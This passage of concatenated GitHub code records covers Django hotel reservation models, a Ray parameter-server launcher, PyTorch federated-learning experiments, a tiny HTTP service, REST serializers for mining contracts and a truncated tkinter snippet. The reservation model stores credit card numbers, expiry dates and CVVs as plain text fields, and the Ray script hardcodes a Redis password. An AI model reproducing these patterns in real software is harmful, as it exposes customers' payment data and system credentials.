MinValueValidator(0) ])\n\tinfant\t\t=\t models.IntegerField(default=0,validators = [ MinValueValidator(0) ])\n\n\tnotes\t\t=\tmodels.TextField(blank=True)\n\n\tcity \t\t= \tmodels.CharField(max_length=30,blank=True)\n\tcountry \t= \tmodels.CharField(max_length=30)\n\n\temail \t\t= \tmodels.EmailField(blank=True)\n\n\tcredit \t\t= \tmodels.CharField(max_length=30, blank=True )\n\tcreditexp \t= \tmodels.CharField(max_length=8, blank=True )\n\tcreditcvv\t= \tmodels.CharField(max_length=5, blank=True )\n\n\tconfirm\t\t= models.CharField(max_length=20, blank=True)\n\tclerk\t\t= models.CharField(max_length=20, blank=True)\n\n\tdef num_days (self):\n\t\treturn (self.dateOut - self.dateIn).days\n\n\tdef __unicode__(self):\n\t\tfullname = \"%s %s %s - %s\" % (self.firstname, self.lastname,self.dateIn, self.dateOut )\n\t\treturn(fullname)\n\n#--------------------------------------------------------------------\nclass RsvnForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = '__all__'\n\t\t\n\t\texclude = ['confirm','clerk']\n\t\tlabels = { 'dateIn': 'Check In', 'dateOut' : 'Check Out'}\n\t\twidgets = {\n\n\t\t\t'dateIn'\t:TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'dateOut' :TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'notes'\t\t:Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#--------------------------------------------------------------------\nclass RsvnContactForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = ('status','firstname','lastname', 'source','phone1', 'phone2','city','country','email')\n\n#--------------------------------------------------------------------\n\nclass RsvnCheckForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = ('dateIn','dateOut', 'type','rooms','beds','adult','child','infant','notes')\n\n\n\n\t\tlabels = { 'dateIn': 'Check In', 'dateOut' : 'Check Out'}\n\t\twidgets = {\n\t\t\t'dateIn'\t:TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'dateOut' :TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'notes'\t\t:Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#--------------------------------------------------------------------\nclass Agent (models.Model):\n\tagency\t\t\t=\tmodels.CharField(max_length=30)\n\tcontact\t\t\t= \tmodels.CharField(max_length=30, blank=True)\n\ttelephone\t\t= \tmodels.CharField(max_length=20, blank=True)\n\tfax\t\t\t\t= \tmodels.CharField(max_length=20, 
blank=True)\n\temail \t\t\t= \tmodels.EmailField(blank=True)\n\tnotes\t\t\t=\tmodels.TextField(blank=True)\n\n\tdef __unicode__(self):\n\t\treturn self.agency\n#--------------------------------------------------------------------\nclass AgentForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Agent\n#=========================================================\nclass Service (models.Model):\n\trsvn\t\t\t= \tmodels.ForeignKey(Rsvn)\n\tbreakfast\t\t=\tmodels.BooleanField(default=False)\n\tairport\t\t\t=\tmodels.BooleanField(default=False)\n\tdailymaid\t\t=\tmodels.BooleanField(default=False)\n\textrabed\t\t=\tmodels.BooleanField(default=False)\n\tcrib\t\t\t=\tmodels.BooleanField(default=False)\n\tconnect\t\t\t=\tmodels.BooleanField(default=False)\n\tearlyin\t\t\t=\tmodels.BooleanField(default=False)\n\tlateout\t\t\t=\tmodels.BooleanField(default=False)\n\t\n#--------------------------------------------------------------------\nclass ServiceForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Service\n\n\t\tfields= '__all__'\n\t\tlabels = { 'airport': 'Airport Trans',\n\t\t\t\t 'earlyin' : 'Early Check In',\n\t\t\t\t 'lateout' : 'Late Check Out',\n\t\t\t\t 'connect' : 'Connecting Room',\n\t\t\t\t 'dailymaid': 'Daily Maid Service',\n\t\t\t\t 'extrabed': 'Extra Bed'}\n\n\t\texclude = ['rsvn']\n#=========================================================\nclass Tour (models.Model):\n\tagent\t\t\t= \tmodels.ForeignKey(Agent)\n\trsvn\t\t\t= \tmodels.ForeignKey(Rsvn)\n\tarrive_flight\t= \tmodels.CharField(max_length=30, blank=True)\n\tarrive_time\t\t=\tmodels.DateTimeField()\n\tdepart_flight\t= \tmodels.CharField(max_length=30, blank=True)\n\tdepart_time\t\t=\tmodels.DateTimeField()\n\tpromo\t\t\t=\tmodels.TextField(blank=True)\n\n\tdef __unicode__(self) :\n\t\treturn \" {} - {}\".format(self.agent,self.arrive_time)\n#--------------------------------------------------------------------\nclass TourForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Tour\n\t\tfields = '__all__'\n\t\texclude = ['rsvn']\n\t\twidgets = {\n\t\t\t'arrive_time' :TextInput (attrs={'class':'datetimepicker'}),\n\t\t\t'depart_time' :TextInput (attrs={'class':'datetimepicker'}),\n\t\t\t'promo' :Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#=========================================================\nclass Scheme (models.Model):\n\trsvn\t\t= \tmodels.ForeignKey(Rsvn)\n\tgridColor \t= \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\trsvnColor = \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\textraColor\t= \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\tdef __unicode__(self):\n\t\tgC = \"{} - {} {} {}\".format(self.rsvn.firstname, self.gridColor, self.rsvnColor, self.extraColor )\n\t\treturn(gC)\n#--------------------------------------------------------------------\nclass SchemeForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Scheme\n\t\tfields = '__all__'\n\t\texclude = ['rsvn']\n\n#=========================================================\nclass RoomInfo (models.Model):\n\tnumber\t\t=\tmodels.CharField(max_length=5)\n\ttype\t\t=\tmodels.CharField(max_length=25, choices=ROOM_TYPE_CHOICES)\n\tbeds\t\t=\tmodels.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\tconnect\t \t= models.CharField(max_length=5, blank=True)\n\tnotes\t\t=\tmodels.TextField(blank=True)\n\tcurrent\t\t=\tmodels.IntegerField(default=0)\n\n\tdef __unicode__(self):\n\t\tfullname = \"Room %s - %s - %s Beds\" % (self.number, self.type,self.beds 
)\n\t\treturn(fullname)\n#---------------------------------------------------------\nclass RoomInfoAdmin(admin.ModelAdmin) :\n\tlist_display = ('type', 'number', 'beds','connect', 'notes')\n\tordering = ('type','number')\n\n#=========================================================\nclass Room (models.Model):\n\trsvn\t\t= models.ForeignKey(Rsvn)\n\troominfo \t=\t models.ForeignKey(RoomInfo)\n\tinfo\t\t= \t models.CharField(max_length=512, blank=True)\n\troomstatus\t=\t models.CharField(max_length=13, choices=ROOM_STATUS,blank=True)\n\n\tdef __unicode__(self):\n\t\tfullname = \"%s %s\" % (self.rsvn,self.roominfo )\n\t\treturn(fullname)\n#---------------------------------------------------------\nclass RoomForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Room\n#=========================================================\nclass EventCalendar(models.Model) :\n\n\ttitle\t\t= models.CharField(max_length=128)\n\tpax\t\t\t= models.IntegerField(validators = [ MinValueValidator(1) ])\n\tevent\t\t= models.TextField(blank=True)\n\tdate\t\t= models.DateField(default=datetime.now().date().isoformat() )\n\tclerk\t\t= models.CharField(max_length=40)\n\tconfirm\t\t= models.CharField(max_length=20, blank=True)\n#=========================================================\nclass Event(models.Model) :\n\n\ttitle\t\t= models.CharField(max_length=128)\n\tpax\t\t\t= models.IntegerField(validators = [ MinValueValidator(1) ])\n\tdescr\t\t= models.TextField(blank=True)\n\tvenue \t\t= models.CharField(max_length=90,choices=VENUE_CHOICES)\n\tdateStart\t= models.DateTimeField( )\n\tdateEnd \t= models.DateTimeField( )\n\tclerk\t\t= models.CharField(max_length=40)\n\n#---------------------------------------------------------\nclass EventForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Event\n\t\texclude = ['clerk','confirm']\n\t\twidgets = {\n\t\t\t'event'\t\t:Textarea\t(attrs={'cols': 30, 'rows': 10, 'class' : 'leftjust' }),\n\t\t\t'dateStart'\t\t:TextInput \t(attrs={'class':'datetimepicker'}),\n\t\t\t'dateEnd'\t\t:TextInput \t(attrs={'class':'datetimepicker'}),\n\n\t\t\t}\n\n#---------------------------------------------------------\nclass Chat(models.Model) :\n\tclerk\t\t= models.CharField(max_length=40)\n\ttime\t\t= models.DateTimeField( )\n\ttitle\t\t= models.CharField(max_length=128)\n\tsubject\t\t= models.CharField(max_length=256)\n\titem\t\t= models.TextField()\n#---------------------------------------------------------\nclass ChatForm(ModelForm) :\n\tclass Meta :\n\t\tmodel = Chat\n\t\texclude = ['date']\n\n#---------------------------------------------------------\n\n\n\n\n\n\n","repo_name":"hoboland21/mango","sub_path":"archive/newmodels.py","file_name":"newmodels.py","file_ext":"py","file_size_in_byte":10800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71360535209","text":"#!/usr/bin/env python\nimport os\nimport time\nimport random\n\nimport ray\nimport torch\n\nfrom ray_parameter_server.async_parameter_server import AsyncParameterServer\nfrom ray_parameter_server.sync_parameter_server import SyncParameterServer\n\nMIN_FREQ = int(os.environ['SUSML_MIN_FREQ'])\nRAND_SEED = int(os.environ['SUSML_RAND_SEED'])\nNUM_EPOCHS = int(os.environ['SUSML_NUM_EPOCHS'])\nBATCH_SIZE = int(os.environ['SUSML_BATCH_SIZE'])\nLR = float(os.environ['SUSML_LR'])\nPARALLELISM_LEVEL = int(os.environ['SUSML_PARALLELISM_LEVEL'])\nRAY_PARAMETER_SERVER_STRATEGY = 
os.environ['RAY_PARAMETER_SERVER_STRATEGY']\n\nrandom.seed(RAND_SEED)\ntorch.manual_seed(RAND_SEED)\ntorch.backends.cudnn.deterministic = True\n\n\ndef start():\n    ray.init(\n        # address='192.168.178.51:6379',\n        address='auto',\n        ignore_reinit_error=True,\n        webui_host='0.0.0.0',\n        redis_password='5241590000000000'\n    )\n    try:\n        if RAY_PARAMETER_SERVER_STRATEGY == 'sync':\n            parameter_server = SyncParameterServer.remote()\n        elif RAY_PARAMETER_SERVER_STRATEGY == 'async':\n            parameter_server = AsyncParameterServer.remote()\n        else:\n            raise Exception('Environment variable \"RAY_PARAMETER_SERVER_STRATEGY\" must be set in ./src/env.sh to either \"sync\" or \"async\" to use one of the parameter server architectures.')\n        print(ray.get(parameter_server.run.remote()))\n    except Exception as e:\n        raise e\n    finally:\n        print('Waiting 10s to allow logs to flush')\n        time.sleep(10)\n        ray.shutdown()\n\n\nif __name__ == \"__main__\":\n    start()\n","repo_name":"jakob-ed/pytorch-dist-pos-tagger","sub_path":"src/start_ray.py","file_name":"start_ray.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29500728355","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom visualization.plots import plot_results, plot_multiple, plot_train_val\nimport os\nfrom logs.experiment_logs import save_data\nfrom logs.training_logs import log\nimport datetime\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef copy_model(main, n_clients, fmod):\n\n    # copying main model weights and saving to temporary files to load at next training epoch\n    # main: main(centralized) model\n    # n_clients: number of clients(nodes)\n    # fmod: folder for temporary models\n\n    for i in range(n_clients):\n        name1 = fmod + 'federated_model_weights_' + str(i)\n        torch.save(main.state_dict(), name1)\n    \"\"\"\n    #averaging optimizer parameters\n    name1 = fmod + 'federated_model_opt_' + str(i)\n    torch.save(opt.state_dict(), name1)\n    \"\"\"\n\n\ndef get_loaders(n, main_ds, batch_size):\n    # doing random split of dataset at N equal sized loaders to emulate clients\n    # n: number of clients\n    # main_ds: dataset to split\n    # batch_size: batch size of each client data loader\n    split = int(len(main_ds) / n)\n    loaders = list()\n    splits = [split for i in range(n)]\n    splits[-1] = len(main_ds) - split * (len(splits) - 1)\n    print('split_sizes: ', splits)\n    datasets = torch.utils.data.random_split(main_ds, splits)\n    for dataset in datasets:\n        dl = torch.utils.data.DataLoader(dataset=dataset,\n                                         pin_memory=True,\n                                         batch_size=batch_size,\n                                         shuffle=True)\n        loaders.append(dl)\n    return loaders\n\n\ndef fix_arch(model, num_classes):\n    # fixing FC layer of ResNet to predict required number of classes\n    # num_classes: number of classes to fix architecture\n    if isinstance(model, torchvision.models.ResNet):\n        # model.conv1 = torch.nn.Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n        model.fc = torch.nn.Linear(2048, num_classes)\n    return\n\n\ndef fit_epoch(model, optimizer, criterion, train_dl, fn):\n    # training 1 epoch of given model and returning metrics\n    # fn: folder name to save all logs\n    model.train()\n    log('Fitting epoch', fn)\n    running_loss = 0\n    running_acc = 0\n    total = len(train_dl.dataset)\n    cumulative = 0\n    for i, (images, labels) in enumerate(train_dl):\n        cumulative += len(labels)\n        images = images.to(device)\n        labels = labels.to(device)\n        # Forward pass\n        outputs 
= model(images)\n loss = criterion(outputs, labels)\n running_loss += loss.item()\n running_acc += (outputs.argmax(dim=1) == labels).float().cpu().sum()\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n log('Train loss: {:.3f}, Train acc: {:.3f}'.format(running_loss / cumulative,\n running_acc / cumulative * 100.),\n fn)\n log('Train loss: {:.3f}, Train acc: {:.3f}'.format(running_loss / total, running_acc / total * 100.), fn)\n return running_loss / total, running_acc / total * 100.\n\n\ndef save_client(client, opt, i, fmod):\n # saving client training information to interrupt training for aggregation\n # i: index number of client\n # fmod: folder to save weights\n name1 = fmod + 'federated_model_weights_' + str(i)\n name2 = fmod + 'federated_model_opt_' + str(i)\n torch.save(client.state_dict(), name1)\n torch.save(opt.state_dict(), name2)\n del client\n del opt\n\n\ndef load_client(i, arch, lr, fmod, num_classes):\n # loading client model and optimizer to continue training\n # fmod: folder to load weights\n # num_classes: number of classes to fix architecture\n model = arch()\n fix_arch(model, num_classes)\n name1 = fmod + 'federated_model_weights_' + str(i)\n name2 = fmod + 'federated_model_opt_' + str(i)\n model.load_state_dict(torch.load(name1))\n model = model.to(device)\n opt = torch.optim.Adam(model.parameters(), lr=lr)\n opt.load_state_dict(torch.load(name2))\n return model, opt\n\n\ndef validation(model, criterion, val_dl):\n # validating on given loader 1 epoch on given model and returning metrics\n model.eval()\n correct = 0.\n loss = 0.\n cumulative = 0\n with torch.no_grad():\n for i, (images, labels) in enumerate(val_dl):\n cumulative += len(labels)\n images = images.to(device)\n labels = labels.to(device)\n outputs = model(images)\n loss += criterion(outputs, labels).item()\n correct += (outputs.argmax(dim=1) == labels).float().sum()\n if i % 100 == 0:\n print('loss: {:.3f}, Acc: {:.3f}'.format(loss / cumulative, correct / cumulative * 100.))\n\n # model.train()\n return correct / float(len(val_dl.dataset)) * 100., loss / float(len(val_dl.dataset))\n\n\ndef aggregation(main_model, n_clients, arch, lr, fmod, num_classes):\n # simple weights averaging aggregation\n\n # client_models = list()\n # client_models = [load_client(i,arch,lr,fmod,num_classes) for i in range(n_clients)]\n # global m1\n for name in main_model.state_dict():\n param = main_model.state_dict()[name]\n tmp = torch.zeros(param.shape, dtype=torch.float).to(device)\n fl = True\n for j in range(n_clients):\n model, opt = load_client(j, arch, lr, fmod, num_classes)\n tmp += model.state_dict()[name].data.float()\n param.data.copy_(tmp * (1. / n_clients))\n copy_model(main_model, n_clients, fmod)\n\n\n\"\"\"\n if (j == 0) and fl:\n m1 = opt\n print(\"copied successfully\")\n else:\n for i in opt.state_dict()['state']:\n m1.state_dict()['state'][i]['exp_avg'].data += opt.state_dict()['state'][i]['exp_avg'].data\n m1.state_dict()['state'][i]['exp_avg_sq'].data += opt.state_dict()['state'][i]['exp_avg_sq'].data\n for i in m1.state_dict()['state']:\n m1.state_dict()['state'][i]['exp_avg'].data /= n_clients\n m1.state_dict()['state'][i]['exp_avg_sq'].data /= n_clients\n\n fl = False\n param.data.copy_(tmp * (1. 
/ n_clients))\n\n copy_model(main_model, m1, n_clients, fmod)\n\n for name in main_opt.state_dict():\n param = main_opt.state_dict()[name]\n tmp = torch.zeros(param.shape, dtype=torch.float).to(device)\n for j in range(n_clients):\n tmp += client_models[j][1].state_dict()[name].data.float()\n param.data.copy_(tmp * (1. / n_clients))\n\"\"\"\n\n\n# copy_model(main_model, n_clients, fmod)\n\n\ndef federated(n_clients, arch, train_dataset, val_dl, fn, epoch_step=1, lr=1e-3, n_epochs=30, num_classes=2,\n batch_size=128, train_dl=None):\n \"\"\"\n\n :param n_clients: number of clients\n :param arch: model architecture\n :param train_dataset: PyTorch dataset\n :param val_dl: validation data loader\n :param fn: folder of experiment\n :param epoch_step: number of local epochs before averaging\n :param lr: learning rate\n :param n_epochs: total number of epochs\n :param num_classes: number of classes\n :param batch_size: batch size\n :param train_dl: train data loader\n :return: loss and accuracy metric of federated trained model\n \"\"\"\n\n fmod = fn + '/models/'\n fplot = fn + '/plots/'\n try:\n os.mkdir(fmod)\n except FileExistsError:\n pass\n main_model = arch(pretrained=True)\n fix_arch(main_model, num_classes)\n main_model = main_model.to(device)\n torch.save(main_model.state_dict(), 'initial_model')\n criterion = nn.CrossEntropyLoss()\n train_loaders = get_loaders(n_clients, train_dataset, batch_size=batch_size)\n client_models = [arch() for i in range(n_clients)]\n for i, model in enumerate(client_models):\n fix_arch(model, num_classes)\n optimizers = [torch.optim.Adam(client_models[i].parameters(), lr=lr) for i in range(n_clients)]\n\n for i in range(n_clients):\n save_client(client_models[i], optimizers[i], i, fmod)\n val_loss = list()\n val_acc = list()\n train_loss = list()\n train_acc = list()\n copy_model(main_model, n_clients, fmod)\n for epoch in range(n_epochs):\n losstr = 0.\n acctr = 0.\n for i in range(n_clients):\n client, opt = load_client(i, arch, lr, fmod, num_classes)\n loss, acc = fit_epoch(client, opt, criterion, train_loaders[i], fn)\n losstr += loss\n acctr += acc\n save_client(client, opt, i, fmod)\n losstr /= n_clients\n acctr /= n_clients\n if (epoch + 1) % epoch_step == 0:\n aggregation(main_model, n_clients, arch, lr, fmod, num_classes)\n acc, loss = validation(main_model, criterion, val_dl)\n # acctr, losstr = validation(main_model, criterion, train_dl)\n log('Epoch [{}/{}], ValLoss: {:.4f}, ValAccuracy: {:.3f}'\n .format(epoch + 1, n_epochs, loss, acc), fn)\n log('Epoch [{}/{}], TrainLoss: {:.4f}, TrainAccuracy: {:.3f}'\n .format(epoch + 1, n_epochs, losstr, acctr), fn)\n val_loss.append(loss)\n val_acc.append(acc)\n train_loss.append(losstr)\n train_acc.append(acctr)\n else:\n log('Epoch [{}/{}]'.format(epoch + 1, n_epochs), fn)\n plot_train_val(fplot + 'federated_training.png', train_acc, val_acc, train_loss, val_loss)\n val_loss = val_loss\n val_acc = val_acc\n return val_loss, val_acc, main_model\n\n\ndef single(arch, train_dl, val_dl, fn, lr=1e-3, epoch_step=1, n_epochs=30, num_classes=2):\n\n \"\"\"\n Training model with same architecture as clients but using whole training dataset\n :param arch: model architecture\n :param train_dl: train data loader\n :param val_dl: validation data loader\n :param fn: folder of experiment\n :param lr: learning rate\n :param epoch_step: number of local epochs before validation\n :param n_epochs: total number of epochs\n :param num_classes: number of classes\n :return: loss and accuracy\n \"\"\"\n fplot = fn + '/plots/'\n 
model = arch(pretrained=True)\n    # adapt the classifier head to num_classes once, before loading, so the\n    # saved 'initial_model' weights fit and are not re-initialized afterwards\n    fix_arch(model, num_classes)\n\n    #model.load_state_dict(torch.load('unlabeled_model'))\n    model.load_state_dict(torch.load('initial_model'))\n    model = model.to(device)\n    # torch.save(model.state_dict(), 'initial_model_unlabeled')\n    opt = torch.optim.Adam(model.parameters(), lr=lr)\n    criterion = nn.CrossEntropyLoss()\n    val_loss = list()\n    val_acc = list()\n    train_loss = list()\n    train_acc = list()\n    for epoch in range(n_epochs):\n        losstr, acctr = fit_epoch(model, opt, criterion, train_dl, fn)\n        if (epoch + 1) % epoch_step == 0:\n            acc, loss = validation(model, criterion, val_dl)\n            val_loss.append(loss)\n            val_acc.append(acc)\n            train_loss.append(losstr)\n            train_acc.append(acctr)\n            log('Epoch [{}/{}], ValLoss: {:.4f}, ValAccuracy: {:.3f}'\n                .format(epoch + 1, n_epochs, loss, acc), fn)\n        else:\n            log('Epoch [{}/{}]'.format(epoch + 1, n_epochs), fn)\n    plot_train_val(fplot + 'single_training.png', train_acc, val_acc, train_loss, val_loss)\n    return val_loss, val_acc, model\n\n\ndef experiment(arch, train_dataset, validation_dataset, n_epochs=30, n_clients=10, n_experiments=10,\n               learning_rate=1e-3,\n               batch_size=128,\n               epoch_step=1,\n               prefix='1'):\n    \"\"\"\n    Performs a series of experiments comparing federated and single-model performance with the same initial weights\n    :param arch: model architecture\n    :param train_dataset: train dataset\n    :param validation_dataset: validation dataset\n    :param n_epochs: total number of epochs\n    :param n_clients: number of clients\n    :param n_experiments: number of experiments\n    :param learning_rate: learning rate\n    :param batch_size: batch size\n    :param epoch_step: number of local epochs before averaging\n    :param prefix: prefix to add in folder name\n    :return: void\n    \"\"\"\n    path = os.getcwd()\n    # fn = path + '/experiments/' + prefix + '_nex' + str(n_experiments) + '_nep' + str(n_epochs) + '_nc' + str(\n    #     n_clients) + '_epst' + str(epoch_step)\n    fn = path + '/experiments/' + str(datetime.datetime.now().date()) + '_' + str(\n        datetime.datetime.now().time()) + '_' + prefix\n    fplot = fn + '/plots'\n    fn1 = fplot + '/average.png'\n    fn2 = fplot + '/all.png'\n    try:\n        os.mkdir(fn)\n        os.mkdir(fplot)\n    except FileExistsError:\n        pass\n    train_dl = torch.utils.data.DataLoader(dataset=train_dataset,\n                                           batch_size=batch_size,\n                                           pin_memory=True,\n                                           shuffle=True)\n    val_dl = torch.utils.data.DataLoader(dataset=validation_dataset,\n                                         batch_size=batch_size,\n                                         pin_memory=True,\n                                         shuffle=False)\n    all_acc_s = list()\n    all_loss_s = list()\n    all_loss_f = list()\n    all_acc_f = list()\n    average_acc_f = np.zeros((n_epochs // epoch_step), dtype=float)\n    average_loss_f = np.zeros((n_epochs // epoch_step), dtype=float)\n    average_acc_s = np.zeros((n_epochs // epoch_step), dtype=float)\n    average_loss_s = np.zeros((n_epochs // epoch_step), dtype=float)\n    for i in range(n_experiments):\n        log('Starting experiment [' + str(i + 1) + '/' + str(n_experiments) + ']', fn)\n        log('Federated_model', fn)\n        val_loss, val_acc, model_f = federated(n_clients, arch, train_dataset, val_dl, fn, lr=learning_rate,\n                                               n_epochs=n_epochs,\n                                               epoch_step=epoch_step,\n                                               batch_size=batch_size,\n                                               train_dl=train_dl)\n        average_acc_f += np.array(val_acc, dtype=float)\n        average_loss_f += np.array(val_loss, dtype=float)\n        all_loss_f.append(val_loss)\n        all_acc_f.append(val_acc)\n        log('Single_model', fn)\n        val_loss1, val_acc1, model_s = single(arch, train_dl, val_dl, fn, lr=learning_rate, n_epochs=n_epochs,\n                                              epoch_step=epoch_step)\n        all_loss_s.append(val_loss1)\n        all_acc_s.append(val_acc1)\n        
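# the running sums below feed the averaged plot (average.png); the\n        # per-experiment lists collected above feed the overlay plot (all.png)\n        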
average_acc_s += np.array(val_acc1, dtype=float)\n average_loss_s += np.array(val_loss1, dtype=float)\n torch.save(model_f.state_dict(), fn + '/federated_model_' + str(i))\n torch.save(model_s.state_dict(), fn + '/single_model_' + str(i))\n\n # plot_results(val_loss, val_acc, val_loss1, val_acc1, 'Experiment number ' + str(i + 1) + ':')\n\n average_acc_f *= (1. / n_experiments)\n average_loss_f *= (1. / n_experiments)\n average_acc_s *= (1. / n_experiments)\n average_loss_s *= (1. / n_experiments)\n\n save_data(arch, fn, epoch_step=epoch_step, n_epochs=n_epochs,\n n_clients=n_clients, n_experiments=n_experiments, learning_rate=learning_rate, batch_size=batch_size)\n plot_results(fn1, average_loss_f, average_acc_f, average_loss_s, average_acc_s,\n 'Average over all experiments ' + ':')\n plot_multiple(fn2, all_loss_s, all_loss_f, all_acc_s, all_acc_f, epoch_step=epoch_step, n_epochs=n_epochs,\n n_clients=n_clients, n_experiments=n_experiments, arch=str(arch), lr=learning_rate)\n\n return\n","repo_name":"MitrofanovEV/PyTorchFederated","sub_path":"federated.py","file_name":"federated.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31801584781","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\n\nfrom io import BytesIO\n\nimport main, json\n\n\nclass HTTPRequest(BaseHTTPRequestHandler):\n \n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length)\n expansion = main.queryExpansion(json.loads(body)['query'])\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(bytes(json.dumps({\"expansion\":expansion}), 'utf-8'))\n self.wfile.write(response.getvalue())\n\n\nhttpd = HTTPServer(('localhost', 8000), HTTPRequest)\nhttpd.serve_forever()\n","repo_name":"JermXT/synonymExpander","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71476686248","text":"from datetime import date\nfrom rest_framework import serializers, exceptions\nfrom src.application.models import Contract\nfrom src.application.api.v1.formulas import calculate_contract_price\n\nfrom src.application.db_commands import get_cryptocurrency_price_or_404\n\n\nclass GetContractPriceSerizalizer(serializers.ModelSerializer):\n contract_price = serializers.FloatField(read_only=True)\n hashrate = serializers.FloatField(write_only=True)\n contract_start = serializers.DateField(write_only=True)\n contract_end = serializers.DateField(write_only=True)\n\n class Meta:\n model = Contract\n\n fields = [\n 'hashrate',\n 'contract_start',\n 'contract_end',\n 'contract_price'\n ]\n\n def validate(self, attrs):\n contract_data = {\n 'hashrate': attrs.get('hashrate'),\n 'contract_start': attrs.get('contract_start'),\n 'contract_end': attrs.get('contract_end')\n }\n contract_price = calculate_contract_price(\n contract_data=contract_data\n )\n return {\n 'contract_price': contract_price\n }\n\n\nclass CreateContractSerizalizer(serializers.ModelSerializer):\n\n class Meta:\n model = Contract\n\n fields = [\n 'id',\n 'hashrate',\n 'contract_start',\n 'contract_end'\n ]\n\n def validate_contract_start(self, value):\n contract_start = value\n if contract_start < date.today():\n raise exceptions.ValidationError(\n detail='The contract start date cannot be in the past.'\n )\n return value\n\n def 
validate_contract_end(self, value):\n        contract_end = value\n        if contract_end < date.today():\n            raise exceptions.ValidationError(\n                detail='The contract end date cannot be in the past.'\n            )\n        return value\n\n    def validate(self, attrs):\n        validated_data = super().validate(attrs)\n        contract_start = attrs.get('contract_start')\n        contract_end = attrs.get('contract_end')\n\n        if contract_start >= contract_end:\n            raise exceptions.ValidationError(\n                detail='The contract start date must be before the contract end date.'\n            )\n        return validated_data\n\n\nclass GetAllContractsSerizalizer(serializers.ModelSerializer):\n\n    class Meta:\n        model = Contract\n\n        fields = [\n            'id',\n            'hashrate',\n            'contract_start',\n            'contract_end',\n            'is_paid'\n        ]\n\n\nclass ChangeLastContractPaymentStatusSerializer(serializers.ModelSerializer):\n\n    user_id = serializers.CharField(write_only=True)\n    count = serializers.FloatField(write_only=True)\n    crypto_type = serializers.CharField(\n        min_length=3, max_length=4, write_only=True)\n\n    class Meta:\n        model = Contract\n\n        fields = [\n            'user_id',\n            'count',\n            'crypto_type'\n        ]\n\n    def validate(self, attrs):\n        validated_data = super().validate(attrs)\n        customer_id = attrs.get('user_id')\n        count = attrs.get('count')\n        crypto_type = attrs.get('crypto_type')\n        contract = self.Meta.model.objects.filter(\n            customer_id=customer_id, is_paid=False\n        ).first()\n        # guard against the query returning no unpaid contract\n        if contract is None:\n            raise exceptions.ValidationError(\n                detail={'user_id': 'No unpaid contract found for this user.'}\n            )\n        contract_data = {\n            'hashrate': contract.hashrate,\n            'contract_start': contract.contract_start,\n            'contract_end': contract.contract_end\n        }\n        contract_price = calculate_contract_price(contract_data)\n        current_payment = get_cryptocurrency_price_or_404(\n            crypto_type=crypto_type\n        )\n        usdt = current_payment.usdt if crypto_type != 'usdt'\\\n            else current_payment\n        # compare the contract price with the payment converted to USDT\n        current_payment_usdt = usdt * count\n        if contract_price != current_payment_usdt:\n            raise exceptions.ValidationError(\n                detail={'count': 'Contract and payment amounts do not match.'},\n            )\n        return validated_data\n\n    def update(self, instance, validated_data):\n        instance.is_paid = True\n        instance.save()\n        return instance\n","repo_name":"EasyDev-co/CloudMiningWebsite","sub_path":"backend/src/application/api/v1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169630283","text":"from tkinter import *\r\nimport tkinter.messagebox as tmsg\r\n\r\npy_root=Tk()\r\npy_root.title(\"Tkinter\")\r\npy_root.geometry(\"455x366\")\r\n\r\ndef func():\r\n    print(\"Hello!! ......\")\r\n\r\ndef help():\r\n    print(\"I will help you\")\r\n    tmsg.showinfo(\"Help\", \"We will help you with this gui\")\r\n\r\ndef feedback():\r\n    print(\"Give feedback\")\r\n    value = tmsg.askquestion(\"Was your experience Good?\", \"You used this gui.. Was your experience Good?\")\r\n    if value == \"yes\":\r\n        msg = \"Great. Give the feedback on appstore please\"\r\n    else:\r\n        msg = \"Tell us what went wrong. 
